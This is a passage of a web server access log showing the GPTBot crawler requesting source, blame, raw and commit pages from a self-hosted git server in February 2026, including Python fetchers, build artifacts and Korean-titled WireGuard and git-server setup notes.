"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:14:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build" +[17/Feb/2026:14:41:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10747] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" [Client 74.7.227.38] [Length 1494] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/investing_fetcher.py" +[17/Feb/2026:14:41:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 10674] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build" +[17/Feb/2026:14:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/usdkrw_fetcher.py" +[17/Feb/2026:14:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:14:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15179] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15177] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15179] [Gzip 4.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:14:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 15146] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72034] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project" +[17/Feb/2026:14:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72685] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" +[17/Feb/2026:14:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71647] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project" +[17/Feb/2026:14:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 108786] [Gzip 18.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" [Client 74.7.227.38] [Length 9900] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1" +[17/Feb/2026:14:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11959] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:14:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:14:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14876] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14846] [Gzip 8.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 10172] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 260846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:41:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 1332005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" [Client 74.7.227.38] [Length 2813995] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/base_library.zip" +[17/Feb/2026:14:41:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" +[17/Feb/2026:14:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 11235] [Gzip 4.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" +[17/Feb/2026:14:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" [Client 74.7.227.38] [Length 153781] [Gzip 31.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/Analysis-00.toc" +[17/Feb/2026:14:41:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14876] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 14879] [Gzip 8.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" +[17/Feb/2026:14:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:14:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/vite.config.ts" +[17/Feb/2026:14:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:14:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 